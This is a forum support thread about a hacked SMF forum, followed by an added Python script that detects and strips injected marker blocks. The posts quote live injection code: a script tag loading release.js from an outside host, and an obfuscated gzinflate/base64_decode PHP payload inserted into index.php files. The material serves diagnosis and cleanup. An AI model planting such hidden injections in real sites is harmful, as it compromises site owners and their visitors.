Preview broken, possible hack?
Venera:
Hello there.
I noticed problems with the "preview" button on my 2.0.2 forum today. I started to search for problems when I saw this code at the end of my source:
--- Code: ---
</body></html><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>
--- End code ---
As that code is after the html tags, I guess it is causing the preview of the post not to show, so I tried to find that code in my files. I searched all my files for "organicfood" and I found it in just one file (not related to SMF):
--- Code: ---
\www\stats\webalizer\index.html (1 hits)
Line 22: <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->
--- End code ---
I tried to remove that code from the index.html file, and when I look at the page source I can still see it at the end of the page!
I must also note that I did not add that code myself, and I'm the only administrator of my forum (no one else has ftp/login details). I searched for the organicfood code, and I saw that many people reported that their sites were hacked with that code added. I also don't have anything on my server besides SMF.
Nothing in error log.
Forum url: venerinsan.com
Any suggestions, please? Is my forum/server hacked, and how can I remove that code and fix the preview problem?
Regards.
K@:
Have a look at the files on your site. Do any of them have recent datestamps?
If so, have a look at them, especially for "eval base64_decode" stuff, which'll usually be on the first line, or thereabouts.
In a word or three, yes, I think you've been hacked. :(
Got a valid backup of the software on your site? (He asks, expecting the answer "No").
Venera:
Hey.
Yes, I do have a working backup, but I wanted to see if I can just remove the code and fix my forum that way, without losing data posted in the meantime.
You think that I should search for base64_decode text in the SMF files now?
I don't know about datestamps, can you help me with that?
Regards.
Aleksi "Lex" Kilpinen:
If you have an ftp client like FileZilla, you'll be able to see the files' last modification times. If there are edits done to files recently, you should check those files for anything out of place - iframes, javascripts, eval-codes etc.
You should also be on the lookout for any files on your account that are not part of SMF, and you think shouldn't be there.
If you find any traces of an actual hacking, you might also want to contact your host - it's not uncommon for hackers to compromise several accounts at the same time, if they can gain access to one first. So it might be the server was hacked, not just you.
Dzonny:
Okay, just had the same report for one of my forums.
The same script was in the source, so I searched through all my files and found nothing. Then I opened index.php and at the end I found this:
--- Code: ---
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
--- End code ---
That is the code that should be removed from every index.php file inside your forums directory. I just fixed all that, and the code disappeared from the page source.
I don't know how this happened, but I just wanted to post the solution here so if more members have a similar problem they can fix it easily. (although it's not so "easy", there are plenty of index.php files inside the forums dir though)
This problem is fixed, so I'm marking this topic as solved. (I fixed it for Venera)
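Added example, not part of the original thread or of SMF: a Python sketch that finds the marker-delimited blocks shown above in both the PHP form (`#b58b6f# ... #/b58b6f#`) and the HTML form (`<!--b58b6f--> ... <!--/b58b6f-->`), unpacks any `gzinflate(base64_decode("..."))` payload without executing it, and strips the block. Matching any six-hex-digit marker is an assumption that generalizes beyond the one id seen here; all function names and the sample file are constructed for illustration.

```python
import base64, re, zlib
from pathlib import Path

# Paired markers seen in this thread: #id# ... #/id# (PHP) and
# <!--id--> ... <!--/id--> (HTML). Accepting any 6-hex id is an assumption.
BLOCK = re.compile(
    r"(?P<open>#|<!--)(?P<id>[0-9a-f]{6})(?P<close>#|-->)(?P<body>.*?)"
    r"(?P=open)/(?P=id)(?P=close)", re.DOTALL)
PACKED = re.compile(r'gzinflate\(\s*base64_decode\(\s*"([A-Za-z0-9+/=]+)"')

def decode_packed(body):
    """Statically unpack gzinflate(base64_decode("...")); nothing is executed."""
    m = PACKED.search(body)
    if not m:
        return None
    try:  # PHP gzinflate() is raw DEFLATE, hence the negative window size
        raw = zlib.decompress(base64.b64decode(m.group(1)), -zlib.MAX_WBITS)
    except (ValueError, zlib.error):
        return None
    return raw.decode("utf-8", "replace")

def find_blocks(text):
    """Return (marker_id, body, decoded_or_None) for each injected block."""
    return [(m["id"], m["body"].strip(), decode_packed(m["body"]))
            for m in BLOCK.finditer(text)]

def strip_blocks(text):
    """Remove every marker-delimited block; the rest of the file is untouched."""
    return BLOCK.sub("", text)

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Yield (path, blocks) for each file under root that contains a block."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            blocks = find_blocks(path.read_text(errors="replace"))
            if blocks:
                yield path, blocks

def pack_sample(s):  # mimics PHP base64_encode(gzdeflate($s)) for the sample
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return base64.b64encode(c.compress(s.encode()) + c.flush()).decode()

# Constructed sample, not the thread's payload: an infected index.php.
TAG = '<script src="http://example.invalid/x.js"></script>'
SAMPLE = ('<?php\n#a1b2c3#\necho(gzinflate(base64_decode("%s")));\n#/a1b2c3#\n'
          'require("SSI.php");\n' % pack_sample(TAG))

if __name__ == "__main__":
    print(find_blocks(SAMPLE), repr(strip_blocks(SAMPLE)))
```

`scan_tree()` only reports; review each hit and write the `strip_blocks()` result back against a copy of the site, since removing the block does not close whatever access was used to plant it.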